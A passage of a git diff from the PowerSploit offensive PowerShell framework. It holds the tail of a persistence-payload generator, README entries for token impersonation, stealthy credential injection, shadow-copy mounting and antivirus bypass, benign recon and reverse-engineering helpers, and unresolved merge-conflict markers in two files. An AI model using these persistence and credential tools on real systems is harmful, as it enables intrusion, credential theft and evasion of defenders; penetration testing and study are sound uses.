$PersistantScript.ToString().Replace('ORIGINALSCRIPT', $NewScript) + $PersistantScript = $PersistantScript.ToString().Replace('ELEVATEDTRIGGER', $ElevatedTrigger) + $PersistantScript = $PersistantScript.ToString().Replace('USERTRIGGER', $UserTrigger) + + if ($DoNotPersistImmediately) + { + $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', '') + } + else + { + $PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', "$PersistenceScriptName -Persist") + } + +#endregion + +#region Generate final output + +# Generate the persistence removal script +$PersistenceRemoval = @" +# Execute the following to remove the elevated persistent payload +$ElevatedTriggerRemoval +# Execute the following to remove the user-level persistent payload +$UserTriggerRemoval +"@ + + + $PersistantScript | Out-File $PersistentScriptFile + Write-Verbose "Persistence script written to $PersistentScriptFile" + + $PersistenceRemoval | Out-File $RemovalScriptFile + Write-Verbose "Persistence removal script written to $RemovalScriptFile" + + if ($PassThru) + { + # Output a scriptblock of the persistent function. This can be passed to Out-EncodedCommand via the pipeline. + Write-Output ([ScriptBlock]::Create($PersistantScript)) + } + +#endregion +}
\ No newline at end of file diff --git a/PowerSploit.psd1 b/PowerSploit.psd1 index 8c7f939..049c491 100644 --- a/PowerSploit.psd1 +++ b/PowerSploit.psd1 @@ -1,4 +1,4 @@ -@{ +@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'PowerSploit.psm1' @@ -79,6 +79,7 @@ ModuleList = @( @{ModuleName = 'PowerSploit'; ModuleVersion = '1.0.0.0'; GUID = @{ModuleName = 'ReverseEngineering'; ModuleVersion = '1.0.0.0'; GUID = 'cbffaf47-c55a-4901-92e7-8d794fbe1fff'}, @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'} + @{ModuleName = 'Capstone'; ModuleVersion = '1.0.0.0'; GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b'} ) # List of all files packaged with this module @@ -93,4 +94,4 @@ FileList = 'PowerSploit.psd1', 'PowerSploit.psm1' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' -}
\ No newline at end of file +} diff --git a/PowerSploit.psm1 b/PowerSploit.psm1 index 430c1b8..550b8be 100644 --- a/PowerSploit.psm1 +++ b/PowerSploit.psm1 @@ -1 +1 @@ -Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName }
\ No newline at end of file +Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName -DisableNameChecking } @@ -48,11 +48,11 @@ Strips comments and extra whitespace from a script. **Add persistence capabilities to a PowerShell script** -#### `New-UserPersistenceOptions` +#### `New-UserPersistenceOption` Configure user-level persistence options for the Add-Persistence function. -#### `New-ElevatedPersistenceOptions` +#### `New-ElevatedPersistenceOption` Configure elevated persistence options for the Add-Persistence function. @@ -80,6 +80,14 @@ Displays symbolic information from Windows lib files. Returns the path from which Windows will load a Dll for the given executable. +## Capstone + +**A PowerShell binding for the Capstone Engine disassembly framework.** + +#### `Get-CSDisassembly` + +Disassembles a byte array using the Capstone Engine disassembly framework. + ## ReverseEngineering **Tools to aid in reverse engineering.** @@ -132,6 +140,10 @@ Displays the process modules that have been loaded since the call to Register-Pr Stops the running process module trace +#### `Get-Entropy` + +Calculates the entropy of a file or byte array. + ## AntivirusBypass **AV doesn't stand a chance against PowerShell!** @@ -144,6 +156,14 @@ Locates single Byte AV signatures utilizing the same method as DSplit from "clas **All your data belong to me!** +#### `Invoke-TokenManipulation` + +Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + +#### `Invoke-CredentialInjection` + +Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + #### `Invoke-NinjaCopy` Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. @@ -164,6 +184,14 @@ Retrieves the plaintext password and other information for accounts pushed throu A function that takes screenshots at a regular interval and saves them to a folder. +#### `Get-VolumeShadowCopy` + +Lists the device paths of all local volume shadow copies. + +#### `Mount-VolumeShadowCopy` + +Mounts a volume shadow copy. + #### `Out-Minidump` Generates a full-memory minidump of a process. @@ -212,7 +240,7 @@ To see the commands imported, type `Get-Command -Module PowerSploit` If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner: `$Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerSploit) ) - {Get-ChildItem -Recurse | Unblock-File} }` + {Get-ChildItem $_ -Recurse | Unblock-File} }` For help on each individual command, Get-Help is your friend. diff --git a/Recon/Get-ComputerDetails.ps1 b/Recon/Get-ComputerDetails.ps1 index 37abf3e..88a6216 100644 --- a/Recon/Get-ComputerDetails.ps1 +++ b/Recon/Get-ComputerDetails.ps1 @@ -1,4 +1,8 @@ +<<<<<<< HEAD function Get-ComputerDetails +======= +function Get-ComputerDetails +>>>>>>> 946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c { <# .SYNOPSIS @@ -219,6 +223,11 @@ Github repo: https://github.com/clymb3r/PowerShell } +<<<<<<< HEAD +======= +function Find-4624Logons +{ +>>>>>>> 946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c <# .SYNOPSIS @@ -248,8 +257,12 @@ Find unique 4624 logon events. Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell #> +<<<<<<< HEAD function Find-4624Logons { +======= + +>>>>>>> 946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c Param ( $SecurityLog ) diff --git a/Recon/Get-HttpStatus.ps1 b/Recon/Get-HttpStatus.ps1 index fde3d26..8b60306 100644 --- a/Recon/Get-HttpStatus.ps1 +++ b/Recon/Get-HttpStatus.ps1 @@ -137,4 +137,4 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html Write-Output $ScanObject
}
-}
\ No newline at end of file +}
diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1 index ab03734..99bbb89 100644 --- a/Recon/Invoke-Portscan.ps1 +++ b/Recon/Invoke-Portscan.ps1 @@ -1,4 +1,4 @@ -function Invoke-Portscan +function Invoke-Portscan { <# .SYNOPSIS diff --git a/Recon/Invoke-ReverseDnsLookup.ps1 b/Recon/Invoke-ReverseDnsLookup.ps1 index 1346ae6..5e811ee 100644 --- a/Recon/Invoke-ReverseDnsLookup.ps1 +++ b/Recon/Invoke-ReverseDnsLookup.ps1 @@ -50,146 +50,171 @@ IP HostName Description
-----------
Returns the hostnames of the IP addresses specified by the IP range specified.
+
+.EXAMPLE
+
+PS C:\> Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses piped from another source.
+
.LINK
http://www.exploit-monday.com
+https://github.com/mattifestation/PowerSploit
#>
Param (
- [Parameter(Position = 0, Mandatory = $True)]
+ [Parameter(Position = 0, Mandatory = $True,ValueFromPipeline=$True)]
[String]
$IpRange
)
- function Parse-IPList ([String] $IpRange)
- {
-
- function IPtoInt
+ BEGIN {
+
+ function Parse-IPList ([String] $IpRange)
{
- Param([String] $IpString)
+
+ function IPtoInt
+ {
+ Param([String] $IpString)
- $Hexstr = ""
- $Octets = $IpString.Split(".")
- foreach ($Octet in $Octets) {
- $Hexstr += "{0:X2}" -f [Int] $Octet
+ $Hexstr = ""
+ $Octets = $IpString.Split(".")
+ foreach ($Octet in $Octets) {
+ $Hexstr += "{0:X2}" -f [Int] $Octet
+ }
+ return [Convert]::ToInt64($Hexstr, 16)
}
- return [Convert]::ToInt64($Hexstr, 16)
- }
- function InttoIP
- {
- Param([Int64] $IpInt)
- $Hexstr = $IpInt.ToString("X8")
- $IpStr = ""
- for ($i=0; $i -lt 8; $i += 2) {
- $IpStr += [Convert]::ToInt64($Hexstr.SubString($i,2), 16)
- $IpStr += '.'
+ function InttoIP
+ {
+ Param([Int64] $IpInt)
+ $Hexstr = $IpInt.ToString("X8")
+ $IpStr = ""
+ for ($i=0; $i -lt 8; $i += 2) {
+ $IpStr += [Convert]::ToInt64($Hexstr.SubString($i,2), 16)
+ $IpStr += '.'
+ }
+ return $IpStr.TrimEnd('.')
}
- return $IpStr.TrimEnd('.')
- }
- $Ip = [System.Net.IPAddress]::Parse("127.0.0.1")
+ $Ip = [System.Net.IPAddress]::Parse("127.0.0.1")
- foreach ($Str in $IpRange.Split(","))
- {
- $Item = $Str.Trim()
- $Result = ""
- $IpRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
-
- # First, validate the input
- switch -regex ($Item)
+ foreach ($Str in $IpRange.Split(","))
{
- "^$IpRegex/\d{1,2}$"
- {
- $Result = "cidrRange"
- break
- }
- "^$IpRegex-$IpRegex$"
- {
- $Result = "range"
- break
- }
- "^$IpRegex$"
- {
- $Result = "single"
- break
- }
- default
+ $Item = $Str.Trim()
+ $Result = ""
+ $IpRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
+
+ # First, validate the input
+ switch -regex ($Item)
{
- Write-Warning "Inproper input"
- return
+ "^$IpRegex/\d{1,2}$"
+ {
+ $Result = "cidrRange"
+ break
+ }
+ "^$IpRegex-$IpRegex$"
+ {
+ $Result = "range"
+ break
+ }
+ "^$IpRegex$"
+ {
+ $Result = "single"
+ break
+ }
+ default
+ {
+ Write-Warning "Inproper input"
+ return
+ }
}
- }
- #Now, start processing the IP addresses
- switch ($Result)
- {
- "cidrRange"
+ #Now, start processing the IP addresses
+ switch ($Result)
{
- $CidrRange = $Item.Split("/")
- $Network = $CidrRange[0]
- $Mask = $CidrRange[1]
+ "cidrRange"
+ {
+ $CidrRange = $Item.Split("/")
+ $Network = $CidrRange[0]
+ $Mask = $CidrRange[1]
- if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning "Invalid IP address supplied!"; return}
- if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning "Invalid network mask! Acceptable values are 0-30"; return}
+ if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning "Invalid IP address supplied!"; return}
+ if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning "Invalid network mask! Acceptable values are 0-30"; return}
- $BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0')
- #Generate lower limit (Excluding network address)
- $Lower = $BinaryIP.Substring(0, $Mask) + "0" * ((32-$Mask)-1) + "1"
- #Generate upperr limit (Excluding broadcast address)
- $Upper = $BinaryIP.Substring(0, $Mask) + "1" * ((32-$Mask)-1) + "0"
- $LowerInt = [Convert]::ToInt64($Lower, 2)
- $UpperInt = [Convert]::ToInt64($Upper, 2)
- for ($i = $LowerInt; $i -le $UpperInt; $i++) { InttoIP $i }
- }
- "range"
- {
- $Range = $item.Split("-")
+ $BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0')
+ #Generate lower limit (Excluding network address)
+ $Lower = $BinaryIP.Substring(0, $Mask) + "0" * ((32-$Mask)-1) + "1"
+ #Generate upperr limit (Excluding broadcast address)
+ $Upper = $BinaryIP.Substring(0, $Mask) + "1" * ((32-$Mask)-1) + "0"
+ $LowerInt = [Convert]::ToInt64($Lower, 2)
+ $UpperInt = [Convert]::ToInt64($Upper, 2)
+ for ($i = $LowerInt; $i -le $UpperInt; $i++) { InttoIP $i }
+ }
+ "range"
+ {
+ $Range = $item.Split("-")
- if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip }
- else { Write-Warning "Invalid IP address supplied!"; return }
+ if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip }
+ else { Write-Warning "Invalid IP address supplied!"; return }
- if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip }
- else { Write-Warning "Invalid IP address supplied!"; return }
+ if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip }
+ else { Write-Warning "Invalid IP address supplied!"; return }
- $Left = (IPtoInt $Temp1.ToString())
- $Right = (IPtoInt $Temp2.ToString())
+ $Left = (IPtoInt $Temp1.ToString())
+ $Right = (IPtoInt $Temp2.ToString())
- if ($Right -gt $Left) {
- for ($i = $Left; $i -le $Right; $i++) { InttoIP $i }
- }
- else { Write-Warning "Invalid IP range. The right portion must be greater than the left portion."; return}
+ if ($Right -gt $Left) {
+ for ($i = $Left; $i -le $Right; $i++) { InttoIP $i }
+ }
+ else { Write-Warning "Invalid IP range. The right portion must be greater than the left portion."; return}
- break
- }
- "single"
- {
- if ([System.Net.IPAddress]::TryParse($Item,[ref]$Ip)) { $Ip.IPAddressToString }
- else { Write-Warning "Invalid IP address supplied!"; return }
- break
- }
- default
- {
- Write-Warning "An error occured."
- return
+ break
+ }
+ "single"
+ {
+ if ([System.Net.IPAddress]::TryParse($Item,[ref]$Ip)) { $Ip.IPAddressToString }
+ else { Write-Warning "Invalid IP address supplied!"; return }
+ break
+ }
+ default
+ {
+ Write-Warning "An error occured."
+ return
+ }
}
}
- }
+ }
}
-
- Parse-IPList $IpRange | ForEach-Object {
- try {
- $Temp = [System.Net.Dns]::GetHostEntry($_)
+
+ PROCESS {
+ Parse-IPList $IpRange | ForEach-Object {
+ try {
+ Write-Verbose "Resolving $_"
+ $Temp = [System.Net.Dns]::GetHostEntry($_)
- $Result = @{
- IP = $_
- HostName = $Temp.HostName
- }
+ $Result = @{
+ IP = $_
+ HostName = $Temp.HostName
+ }
- New-Object PSObject -Property $Result
- } catch [System.Net.Sockets.SocketException] {}
+ New-Object PSObject -Property $Result
+ } catch [System.Net.Sockets.SocketException] {}
+ }
}
-
}
diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 50b6fc6..5a776eb 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -1,4 +1,4 @@ -@{
+@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Recon.psm1'
@@ -72,9 +72,13 @@ AliasesToExport = '' # List of all modules packaged with this module.
ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'})
-# List of all files packaged with this module +# List of all files packaged with this module
FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1',
+<<<<<<< HEAD 'Invoke-Portscan.ps1', 'Get-ComputerDetails', 'Usage.md' +======= + 'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'Usage.md'
+>>>>>>> 946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c # Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
@@ -85,4 +89,4 @@ FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsL # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
-}
\ No newline at end of file +}
diff --git a/Recon/Recon.psm1 b/Recon/Recon.psm1 index e5234fb..81d3818 100644 --- a/Recon/Recon.psm1 +++ b/Recon/Recon.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} diff --git a/ReverseEngineering/ConvertTo-String.ps1 b/ReverseEngineering/ConvertTo-String.ps1 index ab46c74..1c030b4 100644 --- a/ReverseEngineering/ConvertTo-String.ps1 +++ b/ReverseEngineering/ConvertTo-String.ps1 @@ -1,4 +1,4 @@ -filter ConvertTo-String +filter ConvertTo-String { <# .SYNOPSIS @@ -67,4 +67,4 @@ http://www.exploit-monday.com $FileStream.Close() Write-Output $BinaryText -}
\ No newline at end of file +} diff --git a/ReverseEngineering/Get-Entropy.ps1 b/ReverseEngineering/Get-Entropy.ps1 new file mode 100644 index 0000000..42e5d28 --- /dev/null +++ b/ReverseEngineering/Get-Entropy.ps1 @@ -0,0 +1,106 @@ +function Get-Entropy +{ +<# +.SYNOPSIS + + Calculates the entropy of a file or byte array. + + PowerSploit Function: Get-Entropy + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.PARAMETER ByteArray + + Specifies the byte array containing the data from which entropy will be calculated. + +.PARAMETER FilePath + + Specifies the path to the input file from which entropy will be calculated. + +.EXAMPLE + + C:\PS>Get-Entropy -FilePath C:\Windows\System32\kernel32.dll + +.EXAMPLE + + C:\PS>ls C:\Windows\System32\*.dll | % { Get-Entropy -FilePath $_ } + +.EXAMPLE + + C:\PS>$RandArray = New-Object Byte[](10000) + C:\PS>foreach ($Offset in 0..9999) { $RandArray[$Offset] = [Byte] (Get-Random -Min 0 -Max 256) } + C:\PS>$RandArray | Get-Entropy + + Description + ----------- + Calculates the entropy of a large array containing random bytes. + +.EXAMPLE + + C:\PS> 0..255 | Get-Entropy + + Description + ----------- + Calculates the entropy of 0-255. This should equal exactly 8. + +.OUTPUTS + + System.Double + + Get-Entropy outputs a double representing the entropy of the byte array. + +.LINK + + http://www.exploit-monday.com +#> + + [CmdletBinding()] Param ( + [Parameter(Mandatory = $True, Position = 0, ValueFromPipeline = $True, ParameterSetName = 'Bytes')] + [ValidateNotNullOrEmpty()] + [Byte[]] + $ByteArray, + + [Parameter(Mandatory = $True, Position = 0, ParameterSetName = 'File')] + [ValidateNotNullOrEmpty()] + [IO.FileInfo] + $FilePath + ) + + BEGIN + { + $FrequencyTable = @{} + $ByteArrayLength = 0 + } + + PROCESS + { + if ($PsCmdlet.ParameterSetName -eq 'File') + { + $ByteArray = [IO.File]::ReadAllBytes($FilePath.FullName) + } + + foreach ($Byte in $ByteArray) + { + $FrequencyTable[$Byte]++ + $ByteArrayLength++ + } + } + + END + { + $Entropy = 0.0 + + foreach ($Byte in 0..255) + { + $ByteProbability = ([Double] $FrequencyTable[[Byte]$Byte]) / $ByteArrayLength + if ($ByteProbability -gt 0) + { + $Entropy += -$ByteProbability * [Math]::Log($ByteProbability, 2) + } + } + + Write-Output $Entropy + } +}
\ No newline at end of file diff --git a/ReverseEngineering/Get-ILDisassembly.format.ps1xml b/ReverseEngineering/Get-ILDisassembly.format.ps1xml index f933e1e..21115d6 100644 --- a/ReverseEngineering/Get-ILDisassembly.format.ps1xml +++ b/ReverseEngineering/Get-ILDisassembly.format.ps1xml @@ -1,4 +1,4 @@ -<?xml version="1.0" encoding="utf-8" ?> +<?xml version="1.0" encoding="utf-8" ?> <Configuration> <ViewDefinitions> <View> @@ -18,6 +18,9 @@ <TableColumnHeader> <Label>Operand</Label> </TableColumnHeader> + <TableColumnHeader> + <Label>MetadataToken</Label> + </TableColumnHeader> </TableHeaders> <TableRowEntries> <TableRowEntry> @@ -31,10 +34,13 @@ <TableColumnItem> <PropertyName>Operand</PropertyName> </TableColumnItem> + <TableColumnItem> + <ScriptBlock>if ($_.MetadataToken) {"0x$($_.MetadataToken.ToString('X8'))"}</ScriptBlock> + </TableColumnItem> </TableColumnItems> </TableRowEntry> </TableRowEntries> </TableControl> </View> </ViewDefinitions> -</Configuration>
\ No newline at end of file +</Configuration> diff --git a/ReverseEngineering/Get-ILDisassembly.ps1 b/ReverseEngineering/Get-ILDisassembly.ps1 index 645dc39..6948919 100644 --- a/ReverseEngineering/Get-ILDisassembly.ps1 +++ b/ReverseEngineering/Get-ILDisassembly.ps1 @@ -68,9 +68,9 @@ Disassembles the System.Array.BinarySearch(Array, Object) method .INPUTS
-System.Reflection.MethodInfo
+System.Reflection.MethodInfo, System.Reflection.ConstructorInfo
-The method description containing the raw IL bytecodes.
+A method or constructor description containing the raw IL bytecodes.
.OUTPUTS
@@ -88,7 +88,8 @@ http://www.ecma-international.org/publications/files/ECMA-ST/Ecma-335.pdf Param (
[Parameter(Mandatory = $True, ValueFromPipeline = $True)]
- [System.Reflection.MethodInfo]
+ [ValidateScript({$_ -is [Reflection.MethodInfo] -or $_ -is [Reflection.ConstructorInfo]})]
+ [Object]
$MethodInfo
)
@@ -131,6 +132,7 @@ http://www.ecma-international.org/publications/files/ECMA-ST/Ecma-335.pdf $Type = $Op.OperandType
$Operand = $null
+ $OpInt = $null
if ($Type -eq 'InlineNone') {
$OperandLength = 0
@@ -191,13 +193,14 @@ http://www.ecma-international.org/publications/files/ECMA-ST/Ecma-335.pdf if (($OperandLength -gt 0) -and ($OperandLength -ne 4) -and ($Type -ne 'InlineSwitch') -and ($Type -ne 'ShortInlineBrTarget')) {
# Simply print the hex for all operands with immediate values
- $Operand = "0x{0}" -f (($IL[$Position..($Position+$OperandLength-1)] | ForEach-Object { $_.ToString('X2') }) -join '')
+ $Operand = "0x{0}" -f (($IL[($Position+$OperandLength-1)..$Position] | ForEach-Object { $_.ToString('X2') }) -join '')
}
$Instruction = @{
Position = $InstructionPostion
- Instruction = $Op.Name
+ Instruction = $Op
Operand = $Operand
+ MetadataToken = $OpInt
}
# Return a custom object containing a position, instruction, and fully-qualified operand
@@ -209,4 +212,4 @@ http://www.ecma-international.org/publications/files/ECMA-ST/Ecma-335.pdf # Adjust the position in the opcode array accordingly
$Position += $OperandLength
}
-}
\ No newline at end of file +}
diff --git a/ReverseEngineering/Get-MethodAddress.ps1 b/ReverseEngineering/Get-MethodAddress.ps1 index 4a488cf..1ab0d41 100644 --- a/ReverseEngineering/Get-MethodAddress.ps1 +++ b/ReverseEngineering/Get-MethodAddress.ps1 @@ -1,4 +1,4 @@ -function Get-MethodAddress +function Get-MethodAddress { <# .SYNOPSIS @@ -117,4 +117,4 @@ http://www.exploit-monday.com/2012/11/Get-MethodAddress.html { Write-Error "$($MethodInfo.Name) cannot return an unmanaged address." } -}
\ No newline at end of file +} diff --git a/ReverseEngineering/Get-NtSystemInformation.format.ps1xml b/ReverseEngineering/Get-NtSystemInformation.format.ps1xml index 41b5280..fa3ed41 100644 --- a/ReverseEngineering/Get-NtSystemInformation.format.ps1xml +++ b/ReverseEngineering/Get-NtSystemInformation.format.ps1xml @@ -437,4 +437,4 @@ </ListControl> </View> </ViewDefinitions> -</Configuration>
\ No newline at end of file +</Configuration> diff --git a/ReverseEngineering/Get-NtSystemInformation.ps1 b/ReverseEngineering/Get-NtSystemInformation.ps1 index bb0871a..2bde8f6 100644 --- a/ReverseEngineering/Get-NtSystemInformation.ps1 +++ b/ReverseEngineering/Get-NtSystemInformation.ps1 @@ -1,4 +1,4 @@ -function Get-NtSystemInformation +function Get-NtSystemInformation { <# .SYNOPSIS diff --git a/ReverseEngineering/Get-PEB.format.ps1xml b/ReverseEngineering/Get-PEB.format.ps1xml index 3d075eb..59b5362 100644 --- a/ReverseEngineering/Get-PEB.format.ps1xml +++ b/ReverseEngineering/Get-PEB.format.ps1xml @@ -1207,4 +1207,4 @@ </ListControl>
</View>
</ViewDefinitions>
-</Configuration>
\ No newline at end of file +</Configuration>
diff --git a/ReverseEngineering/Get-PEB.ps1 b/ReverseEngineering/Get-PEB.ps1 index 86e064d..7ec5089 100644 --- a/ReverseEngineering/Get-PEB.ps1 +++ b/ReverseEngineering/Get-PEB.ps1 @@ -1,4 +1,4 @@ -function Get-PEB
+function Get-PEB
{
<#
.SYNOPSIS
@@ -1089,4 +1089,4 @@ http://msdn.microsoft.com/en-us/library/windows/desktop/aa813706(v=vs.85).aspx END{}
-}
\ No newline at end of file +}
diff --git a/ReverseEngineering/Get-Strings.ps1 b/ReverseEngineering/Get-Strings.ps1 index 7acb9f1..2cb971c 100644 --- a/ReverseEngineering/Get-Strings.ps1 +++ b/ReverseEngineering/Get-Strings.ps1 @@ -1,4 +1,4 @@ -function Get-Strings
+function Get-Strings
{
<#
.SYNOPSIS
@@ -95,4 +95,4 @@ http://www.exploit-monday.com }
}
END {}
-}
\ No newline at end of file +}
diff --git a/ReverseEngineering/Get-StructFromMemory.ps1 b/ReverseEngineering/Get-StructFromMemory.ps1 index c32c190..68f7651 100644 --- a/ReverseEngineering/Get-StructFromMemory.ps1 +++ b/ReverseEngineering/Get-StructFromMemory.ps1 @@ -1,4 +1,4 @@ -function Get-StructFromMemory
+function Get-StructFromMemory
{
<#
.SYNOPSIS
@@ -200,4 +200,4 @@ http://www.exploit-monday.com $SafeHandle.Close()
Write-Output $ParsedStruct
-}
\ No newline at end of file +}
diff --git a/ReverseEngineering/New-Object.ps1 b/ReverseEngineering/New-Object.ps1 Binary files differindex 77b24f6..52c38c8 100644 --- a/ReverseEngineering/New-Object.ps1 +++ b/ReverseEngineering/New-Object.ps1 diff --git a/ReverseEngineering/ProcessModuleTrace.format.ps1xml b/ReverseEngineering/ProcessModuleTrace.format.ps1xml index fbad0b9..ffb6761 100644 --- a/ReverseEngineering/ProcessModuleTrace.format.ps1xml +++ b/ReverseEngineering/ProcessModuleTrace.format.ps1xml @@ -1,4 +1,4 @@ -<?xml version="1.0" encoding="utf-8" ?> +<?xml version="1.0" encoding="utf-8" ?> <Configuration> <ViewDefinitions> <View> @@ -33,4 +33,4 @@ </ListControl> </View> </ViewDefinitions> -</Configuration>
\ No newline at end of file +</Configuration> diff --git a/ReverseEngineering/ProcessModuleTrace.ps1 b/ReverseEngineering/ProcessModuleTrace.ps1 index 3eb57a7..85f7105 100644 --- a/ReverseEngineering/ProcessModuleTrace.ps1 +++ b/ReverseEngineering/ProcessModuleTrace.ps1 @@ -1,4 +1,4 @@ -function Register-ProcessModuleTrace +function Register-ProcessModuleTrace { <# .SYNOPSIS @@ -100,4 +100,4 @@ function Unregister-ProcessModuleTrace #> Unregister-Event -SourceIdentifier 'ModuleLoaded' -}
\ No newline at end of file +} diff --git a/ReverseEngineering/ReverseEngineering.psd1 b/ReverseEngineering/ReverseEngineering.psd1 index b7da355..d9c733f 100644 --- a/ReverseEngineering/ReverseEngineering.psd1 +++ b/ReverseEngineering/ReverseEngineering.psd1 @@ -1,4 +1,4 @@ -@{
+@{
# Script module or binary module file associated with this manifest.
ModuleToProcess = 'ReverseEngineering.psm1'
@@ -76,7 +76,7 @@ ModuleList = @(@{ModuleName = 'ReverseEngineering'; ModuleVersion = '1.0.0.0'; G FileList = 'ReverseEngineering.psm1', 'ReverseEngineering.psd1', 'Get-ILDisassembly.ps1', 'Get-NtSystemInformation.format.ps1xml',
'Get-NtSystemInformation.ps1', 'Get-Member.ps1', 'Get-MethodAddress.ps1', 'Get-PEB.format.ps1xml',
'Get-PEB.ps1', 'Get-Strings.ps1', 'Get-StructFromMemory.ps1', 'ConvertTo-String.ps1',
- 'New-Object.ps1', 'Get-ILDisassembly.format.ps1xml', 'ProcessModuleTrace.ps1', 'Usage.md'
+ 'Get-Entropy.ps1', 'New-Object.ps1', 'Get-ILDisassembly.format.ps1xml', 'ProcessModuleTrace.ps1', 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
diff --git a/ReverseEngineering/ReverseEngineering.psm1 b/ReverseEngineering/ReverseEngineering.psm1 index 5bb81d3..81d3818 100644 --- a/ReverseEngineering/ReverseEngineering.psm1 +++ b/ReverseEngineering/ReverseEngineering.psm1 @@ -1 +1 @@ -Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} diff --git a/ScriptModification/Out-CompressedDll.ps1 b/ScriptModification/Out-CompressedDll.ps1 index 3aa5c2b..5e6897d 100644 --- a/ScriptModification/Out-CompressedDll.ps1 +++ b/ScriptModification/Out-CompressedDll.ps1 @@ -1,4 +1,4 @@ -function Out-CompressedDll
+function Out-CompressedDll
{
<#
.SYNOPSIS
@@ -78,4 +78,4 @@ $EncodedCompressedFile "@
Write-Output $Output
-}
\ No newline at end of file +}
diff --git a/ScriptModification/Out-EncodedCommand.ps1 b/ScriptModification/Out-EncodedCommand.ps1 index cae4715..04e8c12 100644 --- a/ScriptModification/Out-EncodedCommand.ps1 +++ b/ScriptModification/Out-EncodedCommand.ps1 @@ -1,4 +1,4 @@ -function Out-EncodedCommand
+function Out-EncodedCommand
{
<#
.SYNOPSIS
@@ -181,4 +181,4 @@ http://www.exploit-monday.com }
Write-Output $CommandLineOutput
-}
\ No newline at end of file +}
diff --git a/ScriptModification/Out-EncryptedScript.ps1 b/ScriptModification/Out-EncryptedScript.ps1 index 3f09020..4fc69cf 100644 --- a/ScriptModification/Out-EncryptedScript.ps1 +++ b/ScriptModification/Out-EncryptedScript.ps1 @@ -126,4 +126,4 @@ return $encoding.GetString($h,0,$h.Length); Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)"
-}
\ No newline at end of file +}
diff --git a/ScriptModification/Remove-Comments.ps1 b/ScriptModification/Remove-Comments.ps1 index ec75927..45a9746 100644 --- a/ScriptModification/Remove-Comments.ps1 +++ b/ScriptModification/Remove-Comments.ps1 @@ -1,4 +1,4 @@ -function Remove-Comments
+function Remove-Comments
{
<#
.SYNOPSIS
@@ -153,4 +153,4 @@ http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/ }
